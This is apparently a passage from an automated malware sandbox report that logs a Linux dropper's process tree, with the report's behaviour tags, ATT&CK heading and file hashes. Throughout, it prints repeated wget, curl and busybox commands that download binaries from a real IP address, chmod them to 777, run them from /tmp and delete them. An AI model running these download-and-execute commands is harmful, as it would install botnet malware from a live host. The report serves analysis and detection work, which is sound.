/bin/busybox/bin/busybox wget http://87.120.126.196/bins/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq2⤵PID:936
-
-
/bin/chmodchmod 777 zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq2⤵
- File and Directory Permissions Modification
PID:937
-
-
/tmp/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq./zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq2⤵
- Executes dropped EXE
PID:938
-
-
/bin/rmrm zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq2⤵PID:939
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N2⤵PID:940
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:941
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N2⤵PID:942
-
-
/bin/chmodchmod 777 h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N2⤵
- File and Directory Permissions Modification
PID:943
-
-
/tmp/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N./h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N2⤵
- Executes dropped EXE
PID:944
-
-
/bin/rmrm h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N2⤵PID:945
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj2⤵PID:946
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:947
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj2⤵PID:948
-
-
/bin/chmodchmod 777 tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj2⤵
- File and Directory Permissions Modification
PID:949
-
-
/tmp/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj./tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj2⤵
- Executes dropped EXE
PID:950
-
-
/bin/rmrm tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj2⤵PID:951
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp2⤵PID:952
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:953
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp2⤵PID:954
-
-
/bin/chmodchmod 777 nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp2⤵
- File and Directory Permissions Modification
PID:955
-
-
/tmp/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp./nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp2⤵
- Executes dropped EXE
PID:956
-
-
/bin/rmrm nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp2⤵PID:957
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S2⤵PID:958
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:959
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S2⤵PID:960
-
-
/bin/chmodchmod 777 Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S2⤵
- File and Directory Permissions Modification
PID:961
-
-
/tmp/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S./Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S2⤵
- Executes dropped EXE
PID:962
-
-
/bin/rmrm Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S2⤵PID:963
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA2⤵PID:964
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:965
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA2⤵PID:966
-
-
/bin/chmodchmod 777 RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA2⤵
- File and Directory Permissions Modification
PID:967
-
-
/tmp/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA./RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA2⤵
- Executes dropped EXE
PID:968
-
-
/bin/rmrm RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA2⤵PID:969
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz2⤵PID:970
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:971
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz2⤵PID:972
-
-
/bin/chmodchmod 777 zunJs37CUY2h9nRreComkTdOAsAvGJSgPz2⤵
- File and Directory Permissions Modification
PID:973
-
-
/tmp/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz./zunJs37CUY2h9nRreComkTdOAsAvGJSgPz2⤵
- Executes dropped EXE
PID:974
-
-
/bin/rmrm zunJs37CUY2h9nRreComkTdOAsAvGJSgPz2⤵PID:975
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb2⤵PID:976
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:977
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb2⤵PID:978
-
-
/bin/chmodchmod 777 OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb2⤵
- File and Directory Permissions Modification
PID:979
-
-
/tmp/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb./OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb2⤵
- Executes dropped EXE
PID:980
-
-
/bin/rmrm OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb2⤵PID:981
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97